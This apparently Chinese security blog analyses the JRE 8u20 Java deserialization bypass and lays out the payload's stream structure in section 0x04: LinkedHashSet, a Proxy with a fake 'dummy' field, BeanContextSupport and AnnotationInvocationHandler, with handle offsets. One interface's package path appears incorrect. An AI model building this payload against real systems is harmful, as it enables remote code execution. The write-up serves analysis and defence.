JRE8u20反序列化漏洞深入分析与利用<\/h1>

0x00 漏洞概述<\/h2>
JRE8u20反序列化漏洞是在JDK7u21漏洞基础上改进而来，它绕过了Java SE对AnnotationInvocationHandler类的修复，允许攻击者通过精心构造的序列化数据实现任意代码执行。该漏洞利用了Java序列化机制中的多个特性，结合异常处理流程，最终实现了安全限制的绕过。<\/p>

0x01 Java序列化机制深入解析<\/h2>

基本序列化格式<\/h3>

Java序列化后的字节流遵循特定格式，主要包含以下关键部分：<\/p>

STREAM_MAGIC<\/strong> (0xACED) - 序列化流魔数<\/li>
STREAM_VERSION<\/strong> (0x0005) - 序列化协议版本<\/li>

实际数据内容<\/li> <\/ol>
关键序列化结构<\/h3>
TC_STRING结构<\/h4>
表示字符串数据，格式如下：<\/p>
TC_STRING newHandle length(2字节) value <\/code><\/pre> 示例：<\/p> TC_STRING 00 08 70 61 73 73 77 6f 72 64 <\/code><\/pre> TC_OBJECT结构<\/h4> 表示一个对象，格式：<\/p> TC_OBJECT classDesc newHandle classdata[] <\/code><\/pre> 其中classDesc是TC_CLASSDESC结构，描述类的元信息。<\/p> TC_CLASSDESC结构<\/h4> 描述类的结构信息：<\/p> TC_CLASSDESC className serialVersionUID newHandle classDescInfo 或 TC_PROXYCLASSDESC newHandle proxyClassDescInfo <\/code><\/pre> classDescInfo包含：<\/p> classDescFlags (1字节)<\/li> fields (字段描述)<\/li> classAnnotation<\/li> superClassDesc<\/li> <\/ul> fields结构<\/h4> 描述类的成员字段：<\/p> (short)<count> fieldDesc[count] <\/code><\/pre> fieldDesc分为：<\/p> primitiveDesc (基本类型)<\/li> objectDesc (对象类型)<\/li> <\/ul> 基本类型编码：<\/p> B - byte<\/li> C - char<\/li> D - double<\/li> F - float<\/li> I - int<\/li> J - long<\/li> L - 对象<\/li> S - short<\/li> Z - boolean<\/li> [ - 数组<\/li> <\/ul> TC_REFERENCE结构<\/h4> 引用之前出现过的对象：<\/p> TC_REFERENCE Handle <\/code><\/pre> 序列化示例分析<\/h3> 以AuthClass为例：<\/p> class<\/span> AuthClass<\/span> implements<\/span> Serializable {<\/span> <\/span><\/span> private<\/span> static<\/span> final<\/span> long<\/span> serialVersionUID =<\/span> 100L<\/span>;<\/span> <\/span><\/span> private<\/span> String password;<\/span> <\/span><\/span> <\/span><\/span> private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream ois)<\/span> throws<\/span> Exception {<\/span> <\/span><\/span> ois.<\/span>defaultReadObject<\/span>();<\/span> <\/span><\/span> if<\/span>(!<\/span>this<\/span>.<\/span>password<\/span>.<\/span>equals<\/span>(<\/span>"root"<\/span>))<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> Exception(<\/span>"Wrong Password."<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>序列化后的关键部分：<\/p> TC_OBJECT TC_CLASSDESC className: "me.lightless.deserialize.vuln.AuthClass" serialVersionUID: 0x0000000000000064 classDescFlags: 0x02 (SC_SERIALIZABLE) fields: - Object: L fieldName: "password" className1: "Ljava\/lang\/String;" classAnnotations: TC_ENDBLOCKDATA (0x78) superClassDesc: TC_NULL (0x70) classdata: password: TC_STRING "123456" <\/code><\/pre> TC_BLOCKDATA结构<\/h3> 当类重写writeObject方法并写入额外数据时，会生成TC_BLOCKDATA结构。例如LinkedHashSet的序列化会包含HashMap的capacity、loadFactor和size等额外信息。<\/p> 0x02 JDK7u21漏洞回顾<\/h2> JDK7u21漏洞利用AnnotationInvocationHandler的反序列化问题，但后续版本增加了类型检查：<\/p> private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream var1)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span> <\/span><\/span> var1.<\/span>defaultReadObject<\/span>();<\/span> <\/span><\/span> <\/span><\/span> \/\/ 新增的类型检查 <\/span><\/span><\/span><\/span> if<\/span> (!<\/span>type.<\/span>isAnnotation<\/span>())<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> InvalidObjectException(<\/span>"Non-annotation type in annotation serial stream"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>虽然检查在defaultReadObject()之后，但异常会中断反序列化流程，使得恶意对象虽然被反序列化但无法触发。<\/p> 0x03 JRE8u20漏洞利用原理<\/h2> 关键发现<\/h3> 漏洞作者发现java.beans.beancontext.BeanContextSupport<\/code>类在反序列化时有特殊的异常处理：<\/p> private<\/span> synchronized<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream ois)<\/span> <\/span><\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span> <\/span><\/span> synchronized<\/span> (<\/span>BeanContext.<\/span>globalHierarchyLock<\/span>)<\/span> {<\/span> <\/span><\/span> ois.<\/span>defaultReadObject<\/span>();<\/span> <\/span><\/span> initialize();<\/span> <\/span><\/span> bcsPreDeserializationHook(<\/span>ois);<\/span> <\/span><\/span> if<\/span> (<\/span>serializable ><\/span> 0<\/span> &&<\/span> this<\/span>.<\/span>equals<\/span>(<\/span>getBeanContextPeer()))<\/span> <\/span><\/span> readChildren(<\/span>ois);<\/span> <\/span><\/span> deserialize(<\/span>ois,<\/span> bcmListeners =<\/span> new<\/span> ArrayList(<\/span>1<\/span>));<\/span> <\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span> <\/span><\/span>public<\/span> final<\/span> void<\/span> readChildren<\/span>(<\/span>ObjectInputStream ois)<\/span> <\/span><\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span> <\/span><\/span> int<\/span> count =<\/span> serializable;<\/span> <\/span><\/span> while<\/span> (<\/span>count--<\/span> ><\/span> 0<\/span>)<\/span> {<\/span> <\/span><\/span> Object child =<\/span> null<\/span>;<\/span> <\/span><\/span> BeanContextSupport.<\/span>BCSChild<\/span> bscc =<\/span> null<\/span>;<\/span> <\/span><\/span> try<\/span> {<\/span> <\/span><\/span> child =<\/span> ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span> bscc =<\/span> (<\/span>BeanContextSupport.<\/span>BCSChild<\/span>)<\/span>ois.<\/span>readObject<\/span>();<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>IOException ioe)<\/span> {<\/span> <\/span><\/span> continue<\/span>;<\/span> <\/span><\/span> }<\/span> catch<\/span> (<\/span>ClassNotFoundException cnfe)<\/span> {<\/span> <\/span><\/span> continue<\/span>;<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span> }<\/span> <\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>关键点：<\/p> 即使readObject抛出异常，流程仍会继续<\/li> 可以通过构造特殊序列化数据让恶意对象被反序列化<\/li> <\/ol> 利用技术<\/h3> 假成员技术<\/strong>：在Proxy对象中插入一个不存在的dummy成员<\/p> 反序列化时会尝试处理这个成员但最终会丢弃<\/li> 但会为这个假成员分配handle<\/li> 这使得我们可以控制关键对象的引用关系<\/li> <\/ul> <\/li> 异常捕获绕过<\/strong>：利用BeanContextSupport的异常捕获机制<\/p> 让AnnotationInvocationHandler在异常捕获流程中被反序列化<\/li> 即使检查失败也不会中断整个流程<\/li> <\/ul> <\/li> 精确偏移计算<\/strong>：精心计算TC_REFERENCE的handle值<\/p> 需要准确引用之前序列化的关键对象<\/li> 包括BeanContextSupport和AnnotationInvocationHandler<\/li> <\/ul> <\/li> <\/ol> 0x04 完整Payload构造<\/h2> 步骤1：构造LinkedHashSet基础结构<\/h3> TC_OBJECT TC_CLASSDESC "java.util.LinkedHashSet" serialVersionUID: 2851667679971038690L flags: SC_SERIALIZABLE (0x02) fields: 0 TC_ENDBLOCKDATA TC_CLASSDESC (父类HashSet) "java.util.HashSet" serialVersionUID: 5024744406713321676L flags: SC_SERIALIZABLE | SC_WRITE_METHOD (0x03) fields: 0 TC_ENDBLOCKDATA TC_NULL classdata: TC_BLOCKDATA (HashMap额外数据) element1 (恶意Templates对象) element2 (Proxy对象) <\/code><\/pre> 步骤2：构造Proxy对象<\/h3> TC_OBJECT TC_PROXYCLASSDESC 1 (接口数量) "com.sun.org.apache.xalan.internal.xsltc.runtime.Templates" TC_ENDBLOCKDATA TC_CLASSDESC (父类Proxy) "java.lang.reflect.Proxy" serialVersionUID: -2222568056686623797L flags: SC_SERIALIZABLE (0x02) fields: - L "dummy" "Ljava\/lang\/Object;" (假成员) - L "h" "Ljava\/lang\/reflect\/InvocationHandler;" TC_ENDBLOCKDATA TC_NULL classdata: TC_OBJECT (dummy成员 - BeanContextSupport) TC_CLASSDESC "java.beans.beancontext.BeanContextSupport" serialVersionUID: -4879613978649577204L flags: SC_SERIALIZABLE | SC_WRITE_METHOD fields: - I "serializable" TC_ENDBLOCKDATA TC_CLASSDESC (父类) "java.beans.beancontext.BeanContextChildSupport" serialVersionUID: 6328947014421475877L fields: - L "beanContextChildPeer" "Ljava\/beans\/beancontext\/BeanContextChild;" TC_ENDBLOCKDATA TC_NULL classdata: serializable: 1 beanContextChildPeer: TC_REFERENCE <handle_to_BeanContextSupport> TC_BLOCKDATA (deserialize数据) 0x00000000 h: TC_REFERENCE <handle_to_AnnotationInvocationHandler> <\/code><\/pre> 步骤3：构造AnnotationInvocationHandler<\/h3> TC_OBJECT TC_CLASSDESC "sun.reflect.annotation.AnnotationInvocationHandler" serialVersionUID: 6182022883658399397L flags: SC_SERIALIZABLE | SC_WRITE_METHOD fields: - L "type" "Ljava\/lang\/Class;" - L "memberValues" "Ljava\/util\/Map;" TC_ENDBLOCKDATA TC_NULL classdata: type: Templates.class memberValues: Map (包含恶意Templates对象) <\/code><\/pre> 关键偏移量计算<\/h3> BeanContextChildPeer引用<\/strong>：<\/p> 需要引用前面的BeanContextSupport对象<\/li> 根据序列化流中对象出现的顺序计算精确handle值<\/li> <\/ul> <\/li> Proxy.h引用<\/strong>：<\/p> 需要引用AnnotationInvocationHandler对象<\/li> 同样需要精确计算其在序列化流中的位置<\/li> <\/ul> <\/li> <\/ol> 典型偏移值：<\/p> BeanContextSupport引用：0x007e0019<\/li> AnnotationInvocationHandler引用：0x007e001d<\/li> <\/ul> 0x05 漏洞修复<\/h2> 在JRE8u20之后的版本中，修复方式为：<\/p> private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream var1)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span> <\/span><\/span> GetField var2 =<\/span> var1.<\/span>readFields<\/span>();<\/span> <\/span><\/span> \/\/ 直接读取字段而非整个对象 <\/span><\/span><\/span><\/span> Class var3 =<\/span> (<\/span>Class)<\/span>var2.<\/span>get<\/span>(<\/span>"type"<\/span>,<\/span> (<\/span>Object)<\/span>null<\/span>);<\/span> <\/span><\/span> \/\/ 严格类型检查 <\/span><\/span><\/span><\/span> if<\/span> (!<\/span>var3.<\/span>isAnnotation<\/span>())<\/span> {<\/span> <\/span><\/span> throw<\/span> new<\/span> InvalidObjectException(<\/span>"Non-annotation type in annotation serial stream"<\/span>);<\/span> <\/span><\/span> }<\/span> <\/span><\/span> \/\/ ... <\/span><\/span><\/span><\/span>}<\/span> <\/span><\/span><\/code><\/pre>修复关键点：<\/p> 使用readFields()而非defaultReadObject()<\/li> 在读取字段时就进行类型检查<\/li> 避免整个对象被反序列化后再检查<\/li> <\/ol> 0x06 防御建议<\/h2> 输入验证<\/strong>：对反序列化的数据来源进行严格校验<\/li> 白名单机制<\/strong>：只允许反序列化可信的类<\/li> 替换方案<\/strong>：考虑使用JSON等更安全的序列化格式<\/li> 及时更新<\/strong>：确保使用最新版本的Java运行时环境<\/li> 安全配置<\/strong>：使用ObjectInputFilter限制可反序列化的类<\/li> <\/ol> 0x07 总结<\/h2> JRE8u20反序列化漏洞展示了Java序列化机制的深层次安全问题，通过精心构造的序列化数据、假成员技术和异常处理流程绕过，实现了安全限制的突破。理解该漏洞需要对Java序列化协议有深入认识，并掌握精确的字节流构造技术。防御此类漏洞需要从输入验证、安全配置和运行时保护等多方面入手。<\/p>